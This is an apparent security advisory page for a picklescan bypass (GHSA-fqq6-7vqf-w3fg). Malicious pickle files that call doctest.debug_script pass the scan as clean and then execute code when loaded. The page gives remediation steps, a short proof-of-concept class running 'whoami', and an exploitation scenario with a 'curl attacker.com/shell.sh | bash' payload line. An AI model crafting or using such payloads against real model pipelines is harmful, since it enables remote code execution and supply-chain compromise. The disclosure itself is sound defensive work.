GHSA-fqq6-7vqf-w3fg: picklescan: detection bypass allows undetected RCE in ML models

GHSA-fqq6-7vqf-w3fg MEDIUM
Published August 26, 2025
CISO Take

picklescan, the standard tool for vetting PyTorch and ML model files before loading, can be fully bypassed using Python's built-in doctest.debug_script function — meaning malicious pickle files pass as clean. Any pipeline gating model ingestion on picklescan is operating with a false security guarantee. Upgrade to picklescan 0.0.30 immediately and audit all models scanned with older versions as potentially compromised.

Risk Assessment

High operational risk for organizations using picklescan as a security control, despite the medium CVSS rating. The vulnerability completely defeats a dedicated security gate rather than exploiting an application weakness. A public PoC exists, exploitation is trivial once you know the bypass, and the blast radius includes any team downloading models from external registries (Hugging Face, PyPI, internal hubs). The false confidence created by a 'clean' picklescan result is arguably more dangerous than having no scanner at all.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.30 0.0.30
402 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to 0.0.30+ immediately (pip install --upgrade picklescan).

  2. AUDIT

    Treat any model file scanned with picklescan < 0.0.30 as unverified — rescan or quarantine.

  3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict; prefer safetensors format for model weights.

  4. SANDBOX

    Execute model loading in isolated environments (containers, VMs) with no network access and minimal OS privileges.

  5. DETECTION

    Monitor for unexpected process spawning (whoami, id, curl, wget) from Python interpreter processes loading ML models.

  6. POLICY

    Add picklescan version pinning to MLOps pipeline requirements and enforce minimum version 0.0.30 in pre-commit hooks or CI gates.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Art. 9 - Risk management system
ISO 42001
6.1.2 - AI risk assessment 8.4 - AI system lifecycle — Acquisition and supply chain
NIST AI RMF
GOVERN 6.1 - Organizational risk policies for AI supply chain MANAGE 2.2 - Mechanisms to sustain oversight of deployed AI
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-fqq6-7vqf-w3fg?

picklescan, the standard tool for vetting PyTorch and ML model files before loading, can be fully bypassed using Python's built-in doctest.debug_script function — meaning malicious pickle files pass as clean. Any pipeline gating model ingestion on picklescan is operating with a false security guarantee. Upgrade to picklescan 0.0.30 immediately and audit all models scanned with older versions as potentially compromised.

Is GHSA-fqq6-7vqf-w3fg actively exploited?

No confirmed active exploitation of GHSA-fqq6-7vqf-w3fg has been reported, but organizations should still patch proactively.

How to fix GHSA-fqq6-7vqf-w3fg?

1. PATCH: Upgrade picklescan to 0.0.30+ immediately (pip install --upgrade picklescan). 2. AUDIT: Treat any model file scanned with picklescan < 0.0.30 as unverified — rescan or quarantine. 3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict; prefer safetensors format for model weights. 4. SANDBOX: Execute model loading in isolated environments (containers, VMs) with no network access and minimal OS privileges. 5. DETECTION: Monitor for unexpected process spawning (whoami, id, curl, wget) from Python interpreter processes loading ML models. 6. POLICY: Add picklescan version pinning to MLOps pipeline requirements and enforce minimum version 0.0.30 in pre-commit hooks or CI gates.

What systems are affected by GHSA-fqq6-7vqf-w3fg?

This vulnerability affects the following AI/ML architecture patterns: ML model loading pipelines, PyTorch model serving, Model hubs and registries, CI/CD pipelines with model validation, Training pipelines using pre-trained models.

What is the CVSS score for GHSA-fqq6-7vqf-w3fg?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using doctest.debug_script function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to doctest.debug_script function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from doctest import debug_script class EvilDoctestDebugScript: def __reduce__(self): # debug_script(src, pm=True) -> exec(src, ...) return debug_script, ("__import__('os').system('whoami')", True) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary targets an organization that routinely downloads community PyTorch models. They craft a malicious .pkl file using the doctest.debug_script bypass — the __reduce__ method returns (debug_script, ('__import__("os").system("curl attacker.com/shell.sh | bash")', True)). The file is uploaded to a public model hub or distributed via a poisoned dependency. The victim's CI/CD pipeline runs picklescan, receives a clean verdict, and the pipeline calls torch.load() or pickle.load() on the file. The embedded payload executes with the permissions of the ML worker process — potentially giving the attacker shell access to training infrastructure, GPU servers, or data lakes containing proprietary training data.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities